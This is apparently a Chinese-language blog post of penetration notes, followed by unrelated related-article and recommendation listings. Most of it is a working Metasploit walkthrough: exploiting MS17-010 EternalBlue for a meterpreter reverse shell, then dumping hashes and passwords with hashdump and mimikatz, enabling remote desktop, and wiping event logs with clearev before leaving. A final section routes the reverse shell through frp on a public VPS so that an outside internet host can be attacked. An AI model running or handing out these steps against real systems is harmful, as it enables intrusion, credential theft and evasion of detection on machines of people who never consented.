一.先用Router Scan 扫描

  看清楚了网络拓扑结构。

二.使用MS17-010批量扫描工具

  下载:ms17-010Scan.exe  (也可以用kali自带的nmap和ms17-10模块扫)

 三.漏洞利用

kali 终端输入

msfconsole
search ms17-010     要是搜不到,请更新你的msf
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.66    设置目标机ip
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.104   设置本机监听ip ,默认LPORT端口为4444   同一个C段才算同一个局域网。不在的话,就会很麻烦(kali 是在虚拟机的话,改为桥接)
exploit      开始执行漏洞利用模块
当出现meterpreter>  说明利用成功
在实验室,五台环境配置相同的机子(ps:都开启防火墙和腾讯安全管家)只成功了一台。其他的总是出现无法连接上445端口。也百度不到答案

四.远程登录目标机

meterpreter>migrate 616 关闭对方防火墙
meterpreter>screenshot  截屏
meterpreter>hashdump    获取目标机hash值

meterpreter>load mimikatz    启动mimikatz

meterpreter>msv         导出hash值
meterpreter>kerberos    获得目标机的账号密码(要是空密码,就要自己创建一个用户,不过会被安全软件拦截)
另开一个终端(!!!!!!!!!!是另开一个!!!!!!!!)
rdesktop 192.168.1.66 -u 账号 -p 密码 
要是连不上就要开3389
meterpreter > run getgui -e   开3389命令,然后再执行上一条命令
meterpreter >clearev    擦除痕迹再跑路

 五.内网打外网(2018/6/12更新)

 

首先把自己的端口转发出去,可以用路由器。博主是用frpc。

环境:操作机内网192.168.1.1     目标机外网   222.222.222.222   一台公网vps  111.111.111.111

frpc.ini

[common]
server_addr = 111.111.111.111
server_port = 1024

[RAT]
type = tcp
local_ip = 192.168.1.1
local_port = 4444
remote_port = 7002  
auth_token = 123

//把192.168.1.1:4444转发到111.111.111.111:7002

运行代理

root@kali:~/Desktop/frp/frp_0.17.0_linux_amd64# ./frpc

第一个msf攻击

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST  222.222.222.222  设置目标机ip
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 111.111.111.111      vps的ip
set LPORT 7002                转发到vps的端口  
exploit

另开一个msf监听

msfconsole

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf exploit(multi/handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(multi/handler) > run

 

 

kali ms17_010 内网环境下渗透笔记的更多相关文章

  1. 内网环境下为Elasticsearch 5.0.2 添加head服务

    背景: 本项目的服务器是内网环境,没有网络,因此需要在离线的环境中,安装head服务. 需要用到的安装包有: node的安装包 elasticsearch的head插件源码 说明:此次只讲述为elas ...

  2. 虚拟机系统ubuntu12.04(内网环境下的虚拟主机)开启远程连接访问

    一.工具准备: 1.内网虚拟机Ubuntu12.04系统主机一台,开放端口为:29999 2.远程连接软件:mobaxterm 二.开启步骤: 1.查看端口状态信息: netstat -antl | ...

  3. 内网环境下搭建maven私服小技巧

    背景 最近接手一个其他公司的项目,因为工程中使用了maven,而且里面有很多他们自己封装很多自己的构件(就是jar.war等等),需要将他们maven私服迁移到我们的私服上去,因为网络环境不通,所以不 ...

  4. ArcGIS API for javascript开发笔记(二)——解决ArcGIS Service中的服务在内网环境下无法进行javascript预览问题

    感谢一路走来默默支持和陪伴的你~~~ ----------------------------拒绝转载-------------------------------- 1.问题说明 在使用ArcGIS ...

  5. 内网环境上部署k8s+docker集群:集群ftp的yum源配置

    接触docker已经有一年了,想把做的时候的一些知识分享给大家. 因为公司机房是内网环境无法连接外网,所以这里所有的部署都是基于内网环境进行的. 首先,需要通过ftp服务制作本地的yum源,可以从ht ...

  6. Centos7.2内网环境安装MySQL5.7.24

    1.配置本地yum源 内网环境,首先需要配置本地yum源,以解决MySQL的依赖安装,具体参考该文:点击打开 2.查看服务器环境 uname -a 3.去官网下载MySQL安装包 MySQL官网网址: ...

  7. 内网环境搭建NTP服务器

    说在前面:ntp和ntpdate区别 ①两个服务都是centos自带的(centos7中不自带ntp).ntp的安装包名是ntp:ntpdate的安装包是ntpdate.他们并非由一个安装包提供. ② ...

  8. FtpServer穿透内网访问配置踩笔记

    FtpServer穿透内网访问配置踩笔记 引言 FtpServer是服务器文件远程管理常用方式. 以前在局域网配置Ftp服务器以及使用公网上的Ftp服务均未碰到问题,固未对Ftp传输进行深入了解. 然 ...

  9. Linux系统如何在离线环境或内网环境安装部署Docker服务和其他服务

    如何在离线环境或纯内网环境的Linux机器上安装部署Docker服务或其他服务.本次我们以Docker服务和Ansible服务为例. 获取指定服务的所有rpm包 保证要获取rpm包的机器能够上网. 本 ...

随机推荐

  1. 第十四章 nginx代理配置

    一.nginx代理 1.常见模式 1.常见模式:1)正向代理2)反向代理​2.区别1)区别在于形式上服务的"对象"不一样2)正向代理代理的对象是客户端,为客户端服务3)反向代理代理 ...

  2. leaflet平台添加天地图方法

    leaflet平台添加天地图得方法具体如下操作 var map = L.map('map',  {   crs: L.CRS.EPSG4326,   zoomControl: true,   edit ...

  3. Linux系统部署WEB项目(2020最新最详细)

    2020最新Linux系统发行版ContOS7演示部署WEB项目 为防止操作权限不足,建议切换root用户,当然如果你对Linux命令熟悉,能够自主完成权限更新操作,可以不考虑此推荐. 更多命令学习推 ...

  4. 【Python 1-0】10个学习Python的理由以及Python的优势有哪些?

    Python的由来 首发地址 Python的创始人是吉多·范罗苏姆,1989年他在阿姆斯特丹的CWI工作,圣诞节期间,吉多·范罗苏姆为了打发圣诞节的无聊,决定开发一个新的脚本解释程序,作为ABC 语言 ...

  5. python接口自动化测试--数据分离读取Excal指定单元格数据

    上一篇博客讲了怎么批量读取Excal单元格数据,现在咱们说一下怎么读取Excal指定单元格数据. 一.首先建一个Test_Main类 #!/usr/bin/python # -*- coding: U ...

  6. 想用Nginx代理一切?行!

    Nginx能代理一切吗? 是的,Nginx可以作为一个优秀的http网关,但nginx能代理SSH2,MySQL,Oracle的连接吗?也算行吧,nginx有stream-module,专门处理TCP ...

  7. SP22343 Norma--序列分治

    Norma 传送门 题意简化: 定义一个区间的贡献为 \(max*min*len\),求给定序列中所有子区间的总贡献和 题解 考虑 \(O(n*log_2n)\) 的复杂度的做法 数据结构??? yz ...

  8. model基础操作(下)

    3.Django多对多表结构操作   3.1 第一种: ManyToManyField   自己不创建第三张关系表,有m2m字段: 根据queryset对象增删改查(推荐)   from django ...

  9. Python爬虫练习(多线程,进程,协程抓取网页)

    详情点我跳转 关注公众号"轻松学编程"了解更多. 一.多线程抓取网页 流程:a.设置种子url b.获取区域列表 c.循环区域列表 d.创建线程获取页面数据 e.启动线程 impo ...

  10. 动态规划之KMP字符匹配算法

    KMP 算法(Knuth-Morris-Pratt 算法)是一个著名的字符串匹配算法,效率很高,但是确实有点复杂. 很多读者抱怨 KMP 算法无法理解,这很正常,想到大学教材上关于 KMP 算法的讲解 ...